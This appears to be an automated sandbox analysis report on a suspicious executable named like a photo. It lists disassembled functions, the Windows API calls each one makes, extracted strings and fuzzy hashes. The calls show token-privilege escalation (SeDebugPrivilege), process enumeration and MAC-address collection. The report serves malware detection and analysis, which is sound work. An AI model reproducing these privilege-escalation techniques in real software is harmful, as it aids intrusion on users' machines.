                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileString_wcslen$_memset
                                                                • String ID: BigDataUrl$Install$Md5$NewBigDataUrl$SSLUrl$Size$ThirdCDNHost$ThirdCDNMinSpeed$Url$Version$https://chc-bd.duoyi.com$murl
                                                                • API String ID: 3101026030-1545733268
                                                                • Opcode ID: 18c76a8de1de86a710b138f9b61fd31c9ca3b712b1db41173ea670001712b651
                                                                • Instruction ID: cef5fc09d10c7f4fb3887c65f4f7ef67f815d83c12d2b59f7a4c82757e6ecb92
                                                                • Opcode Fuzzy Hash: 18c76a8de1de86a710b138f9b61fd31c9ca3b712b1db41173ea670001712b651
                                                                • Instruction Fuzzy Hash: 8CC15F719002ACAEDB20EB54CD81AEEB779AF04304F1041EAE549B7191DBB86FC9CF55
                                                                Function 024718EE Relevance: 48.3, APIs: 24, Strings: 3, Instructions: 1054COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 02471776: GetCurrentProcess.KERNEL32(00000028,?), ref: 0247178C
                                                                  • Part of subcall function 02471776: OpenProcessToken.ADVAPI32(00000000), ref: 02471793
                                                                  • Part of subcall function 02471802: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02471825
                                                                  • Part of subcall function 02471802: _memset.LIBCMT ref: 0247183A
                                                                  • Part of subcall function 02471802: Process32FirstW.KERNEL32(00000000,?), ref: 02471854
                                                                  • Part of subcall function 02471802: CloseHandle.KERNEL32(00000000), ref: 0247188E
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02471931
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 0247194B
                                                                • CloseHandle.KERNEL32(?), ref: 02471958
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 0247198E
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02471BD1
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 02471BEF
                                                                • CloseHandle.KERNEL32(?), ref: 02471BFC
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 02471C35
                                                                • GetLengthSid.ADVAPI32(?), ref: 02471E21
                                                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 02471E34
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02471E69
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 02471E87
                                                                • CloseHandle.KERNEL32(?), ref: 02471E94
                                                                • GetLengthSid.ADVAPI32(?), ref: 024720B9
                                                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 024720CC
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 02472165
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 02471ECD
                                                                  • Part of subcall function 024718A4: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 024718DC
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 02472101
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 0247211F
                                                                • CloseHandle.KERNEL32(?), ref: 0247212C
                                                                • GetLengthSid.ADVAPI32(?), ref: 02472351
                                                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 02472364
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                                                • String ID: $ $SeDebugPrivilege
                                                                • API String ID: 2960649016-2587268233
                                                                • Opcode ID: d554607443cf9e733266dcff832d01565326337187af04cecd83f2b7355614de
                                                                • Instruction ID: 60afb22076aa2e0ca45e0f7cedfe0cb53624053bbdb40af4279659d06ab963bc
                                                                • Opcode Fuzzy Hash: d554607443cf9e733266dcff832d01565326337187af04cecd83f2b7355614de
                                                                • Instruction Fuzzy Hash: D572F972E0110DBBDF15DBA5DD80DEEB7BEAF48344B194026F529E6140EB34EA468B60
                                                                Function 100018EA Relevance: 48.3, APIs: 24, Strings: 3, Instructions: 1054COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 10001772: GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                                                  • Part of subcall function 10001772: OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                                                  • Part of subcall function 100017FE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                                                  • Part of subcall function 100017FE: _memset.LIBCMT ref: 10001836
                                                                  • Part of subcall function 100017FE: Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                                                  • Part of subcall function 100017FE: CloseHandle.KERNEL32(00000000), ref: 1000188A
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 1000192D
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001947
                                                                • CloseHandle.KERNEL32(?), ref: 10001954
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1000198A
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                                                • CloseHandle.KERNEL32(?), ref: 10001BF8
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001C31
                                                                • GetLengthSid.ADVAPI32(?), ref: 10001E1D
                                                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10001E30
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                                                • CloseHandle.KERNEL32(?), ref: 10001E90
                                                                • GetLengthSid.ADVAPI32(?), ref: 100020B5
                                                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 100020C8
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10002161
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001EC9
                                                                  • Part of subcall function 100018A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                                                • CloseHandle.KERNEL32(?), ref: 10002128
                                                                • GetLengthSid.ADVAPI32(?), ref: 1000234D
                                                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10002360
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                                                • String ID: $ $SeDebugPrivilege
                                                                • API String ID: 2960649016-2587268233
                                                                • Opcode ID: d554607443cf9e733266dcff832d01565326337187af04cecd83f2b7355614de
                                                                • Instruction ID: 253941792478b7e33a101aa4b16c8ff9649bddfa32550c9372af5835deac56ed
                                                                • Opcode Fuzzy Hash: d554607443cf9e733266dcff832d01565326337187af04cecd83f2b7355614de
                                                                • Instruction Fuzzy Hash: CE721776E0110EBBEB04DBA4DD80DEEB7BEEF48280B514026F615E7145DB34EA068B65
                                                                Function 004049C5 Relevance: 46.2, APIs: 12, Strings: 14, Instructions: 728COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: /f&T$Duoyi.com-Launcher$DuoyiLauncher.exe$btnProtocol$click$file='icon_down.png' dest='0,0,15,15'$file='icon_up.png' dest='0,0,15,15'$https://id.duoyi.com/html/privacy.html$https://id.duoyi.com/html/service-agreement.html$https://id.duoyi.com/html/xieyi.html$itemselect$open$textchanged$timer
                                                                • API String ID: 176396367-2751513369
                                                                • Opcode ID: b1bf4aad58d1733dacdbea21c19898bdb946c73090b22af9874e4891c79f7554
                                                                • Instruction ID: c86e6ba7bf05d8f4ad854e8e244a03dceb117f87b615aaf8bfc1b252611f18c5
                                                                • Opcode Fuzzy Hash: b1bf4aad58d1733dacdbea21c19898bdb946c73090b22af9874e4891c79f7554
                                                                • Instruction Fuzzy Hash: 90628F712083419FD720EF64C885BABB7E5FF84304F000A6EF599A72D1CB79A945CB56
                                                                Function 00466960 Relevance: 44.0, APIs: 24, Strings: 5, Instructions: 525COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(00632228,3D09168B,00000000,?,00000000), ref: 004669D5
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 00466A0D
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 00466A3C
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 00466ABE
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00466AFD
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 00466B2C
                                                                • InitializeCriticalSection.KERNEL32(00632228), ref: 00466BD0
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 00466C08
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 00466C37
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 00466CB5
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00466CF4
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 00466D23
                                                                • InitializeCriticalSection.KERNEL32(00632228), ref: 00466E31
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 00466E69
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 00466E9D
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 00466F13
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00466F50
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 00466F7F
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 0046705B
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 0046708A
                                                                • InitializeCriticalSection.KERNEL32(00632228), ref: 00467023
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 00467108
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00467147
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 00467176
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterInitializeLeave$_malloc
                                                                • String ID: CHttpMgr::Schedule $CHttpMgr::Schedule() $CHttpMgr::Schedule() $CHttpMgr::Schedule() $http\HttpMgr.cpp
                                                                • API String ID: 2909137988-4015968832
                                                                • Opcode ID: 50ee625a75346f97e577cce233cfe9cea4dc4afd3ed4b107bd2e9efbeef831d8
                                                                • Instruction ID: 39ae5fe453263b4dd265cc18fdf3cdcec3faa80930aea568b81a94b02b8015cb
                                                                • Opcode Fuzzy Hash: 50ee625a75346f97e577cce233cfe9cea4dc4afd3ed4b107bd2e9efbeef831d8
                                                                • Instruction Fuzzy Hash: 7F2203B06403429FC314DF18ED95A1B7BE2FB55318F05070AEA65873A1E37A9A40DBE7
                                                                Function 0045FD80 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 222libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryW.KERNEL32 ref: 0045FEAD
                                                                • GetProcAddress.KERNEL32(00000000,SnmpExtensionInit), ref: 0045FEDF
                                                                • GetProcAddress.KERNEL32(?,SnmpExtensionInitEx), ref: 0045FEEF
                                                                • GetProcAddress.KERNEL32(?,SnmpExtensionQuery), ref: 0045FEFB
                                                                • GetProcAddress.KERNEL32(?,SnmpExtensionTrap), ref: 0045FF0B
                                                                • GetTickCount.KERNEL32 ref: 0045FF17
                                                                • SnmpUtilOidCpy.SNMPAPI(?,?), ref: 0045FF52
                                                                • SnmpUtilOidCpy.SNMPAPI(?,?), ref: 0045FF7C
                                                                • SnmpUtilOidCpy.SNMPAPI(?,?), ref: 0045FF88
                                                                • SnmpUtilOidNCmp.SNMPAPI(?,?,?), ref: 0045FFBD
                                                                • SnmpUtilOidNCmp.SNMPAPI(?,?,?), ref: 0045FFDD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: SnmpUtil$AddressProc$CountLibraryLoadTick
                                                                • String ID: %02x%02x%02x%02x%02x%02x$SnmpExtensionInit$SnmpExtensionInitEx$SnmpExtensionQuery$SnmpExtensionTrap$inetmib1.dll
                                                                • API String ID: 3082973213-2198560563
                                                                • Opcode ID: b0f6a2df261d43a07ded2b48e25fd2f7ad66eedfebe605c80279faeb88a0903a
                                                                • Instruction ID: 2c86369f2643665d7795756fb4d27907461ffb8305cbb100f72eff20a05ca0c6
                                                                • Opcode Fuzzy Hash: b0f6a2df261d43a07ded2b48e25fd2f7ad66eedfebe605c80279faeb88a0903a
                                                                • Instruction Fuzzy Hash: 639136B29183809FD720DF69D884B9BBBE9BBC9704F04891FF18983251D7749508CBA7
                                                                Function 00408F8D Relevance: 35.4, APIs: 5, Strings: 15, Instructions: 431COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00408FD3
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409B59
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409B7F
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409BA5
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409BCB
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409BF1
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409C17
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409C3D
                                                                  • Part of subcall function 00409B33: _wcslen.LIBCMT ref: 00409C63
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 0044A180: _wcslen.LIBCMT ref: 0044A1EA
                                                                  • Part of subcall function 0040CCFF: _strlen.LIBCMT ref: 0040CD16
                                                                • PathFileExistsW.SHLWAPI(?,00000001), ref: 004090D8
                                                                • _wcslen.LIBCMT ref: 004090ED
                                                                • _wcslen.LIBCMT ref: 004090F8
                                                                  • Part of subcall function 004466C0: _wcslen.LIBCMT ref: 00446705
                                                                  • Part of subcall function 004466C0: _vwprintf.LIBCMT ref: 0044672D
                                                                  • Part of subcall function 004466C0: __strftime_l.LIBCMT ref: 0044675B
                                                                  • Part of subcall function 004466C0: _wcslen.LIBCMT ref: 00446768
                                                                  • Part of subcall function 00401560: _memmove.LIBCMT ref: 00401581
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                  • Part of subcall function 00455B40: __CxxThrowException@8.LIBCMT ref: 00455D0C
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455D21
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455DBA
                                                                  • Part of subcall function 00446350: _wcslen.LIBCMT ref: 0044639C
                                                                  • Part of subcall function 00403347: _memmove.LIBCMT ref: 00403367
                                                                • _strlen.LIBCMT ref: 00409192
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_memmove$_strlen$CountException@8ExistsFilePathThrowTick__strftime_l_vwprintf
                                                                • String ID: %s MajorVersion %d MinorVersion %d$%s\%s$00000000$c_downInstall_yiwang_5.2$count_dimension$count_value$gate$installzm_state:%s$installzm_time:%d$logname$mac$package_id$tg.id$title$version
                                                                • API String ID: 79074505-1688863819
                                                                • Opcode ID: 20a1cc74e772f9e72f0ba4abb5452f3c88bb309fd4f28bfda9e3251878471971
                                                                • Instruction ID: 8d6daa807d973574b5569b580e6dd7ed3ab2efec8cac159ab3316edd0eee5d61
                                                                • Opcode Fuzzy Hash: 20a1cc74e772f9e72f0ba4abb5452f3c88bb309fd4f28bfda9e3251878471971
                                                                • Instruction Fuzzy Hash: 8102D2311083848FD321EB65C856BDFBBD9AF84308F44092EF58DA7292DB786909C767
                                                                Function 0041B3B4 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 352fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0041B3BE
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00629448,00000490,0041589C,?,00000000,?,?), ref: 0041B41C
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B443
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B46E
                                                                • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B47A
                                                                • FindResourceW.KERNEL32(00000000,?,?,00000490,0041589C,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B575
                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B58E
                                                                • FreeResource.KERNEL32(00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B59F
                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B5AD
                                                                • LockResource.KERNEL32(?,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B5C9
                                                                • _memmove.LIBCMT ref: 0041B5D1
                                                                • FreeResource.KERNEL32(?), ref: 0041B5DF
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,?,0041583B,?,?), ref: 0041B5FC
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B60F
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B63A
                                                                • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,0041583B,?,?,?,00000001), ref: 0041B646
                                                                • _memset.LIBCMT ref: 0041B6C3
                                                                • CreateDIBSection.GDI32 ref: 0041B729
                                                                • _free.LIBCMT ref: 0041B843
                                                                  • Part of subcall function 00415EBD: _wcslen.LIBCMT ref: 00415EC0
                                                                  • Part of subcall function 00415EBD: _wcslen.LIBCMT ref: 00415EC8
                                                                  • Part of subcall function 00415EBD: _malloc.LIBCMT ref: 00415EE6
                                                                  • Part of subcall function 00415EBD: _wcscpy.LIBCMT ref: 00415EEF
                                                                  • Part of subcall function 00415EBD: _wcscat.LIBCMT ref: 00415EF7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: FileResource$Create$CloseFreeHandleReadSize_wcslen$FindH_prolog3_LoadLockSectionSizeof_free_malloc_memmove_memset_wcscat_wcscpy
                                                                • String ID: (
                                                                • API String ID: 3156420750-3887548279
                                                                • Opcode ID: c8a90df7bcf603e4d9d40d143a70de05e2fe8229a83c505dab29708bbb8984f5
                                                                • Instruction ID: 98688a24d7387161c1534b5811447fe4c2dc5eb9d8b6e9a551e6604bc8e9eb80
                                                                • Opcode Fuzzy Hash: c8a90df7bcf603e4d9d40d143a70de05e2fe8229a83c505dab29708bbb8984f5
                                                                • Instruction Fuzzy Hash: 00D1E9B19002249FCB21AF25CC84ADEBBB5EF55304F1485EBE549A7252DB344EC5CFA8
                                                                Function 00403DB7 Relevance: 30.5, APIs: 7, Strings: 10, Instructions: 792timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • KillTimer.USER32(?,0000000B), ref: 00403E6C
                                                                • KillTimer.USER32(?,0000000C,3D09168B), ref: 00403EB2
                                                                • KillTimer.USER32(?,00000012), ref: 0040401C
                                                                • KillTimer.USER32(?,00000010,3D09168B), ref: 00404118
                                                                  • Part of subcall function 00408F8D: GetTickCount.KERNEL32 ref: 00408FD3
                                                                  • Part of subcall function 00408F8D: PathFileExistsW.SHLWAPI(?,00000001), ref: 004090D8
                                                                  • Part of subcall function 00408F8D: _wcslen.LIBCMT ref: 004090ED
                                                                  • Part of subcall function 00401478: __EH_prolog3.LIBCMT ref: 0040147F
                                                                • KillTimer.USER32(?,?,3D09168B), ref: 00404036
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                  • Part of subcall function 00402D3B: __EH_prolog3.LIBCMT ref: 00402D42
                                                                • _wcslen.LIBCMT ref: 004041A4
                                                                • _wcslen.LIBCMT ref: 004041BB
                                                                  • Part of subcall function 00401741: _memmove.LIBCMT ref: 00401796
